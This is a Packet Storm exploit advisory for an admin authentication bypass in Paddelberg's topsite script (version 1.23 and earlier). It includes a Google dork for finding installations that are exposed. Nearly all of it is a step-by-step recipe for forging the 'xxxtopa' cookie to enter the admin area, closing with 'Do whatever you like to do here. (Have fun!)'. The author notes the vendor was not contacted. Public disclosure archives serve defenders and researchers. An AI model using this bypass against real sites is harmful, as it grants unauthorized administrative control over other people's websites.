Paddelberg Topsite Script Insecure Cookie

2012-01-09T00:00:00
ID PACKETSTORM:108481
Type packetstorm
Reporter Christian Inci
Modified 2012-01-09T00:00:00

Description

                                        
                                            `# Exploit Title: Paddelberg's topsite-script admin auth bypass.  
# Google Dork: intext:"powered by php scripte webmaster resource"  
# Date: 8. 1. 2012  
# Author: Christian Inci  
# Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/  
# Version: <= 1.23 (22. 9. 2007)  
# Tested on: 1.23  
# Vendor response: None, as I didn't contacted them.  
  
PoC/Exploit:  
1.: Open a random cookie editor.  
2.: Create a cookie, as usually:  
2.1: Set the host name.  
2.2: Set the path name. (e.g.: "[script-base-path]/admin/")  
2.3: Set the cookie name to "xxxtopa".  
2.4: Set the cookie value to ":".  
2.5: Save it.  
3.: Visit the following URL: "[script-base-url]/admin/". (This won't work if the directory is "protected" with a .htaccess file.)  
4.: Do whatever you like to do here. (Have fun!)  
  
  
`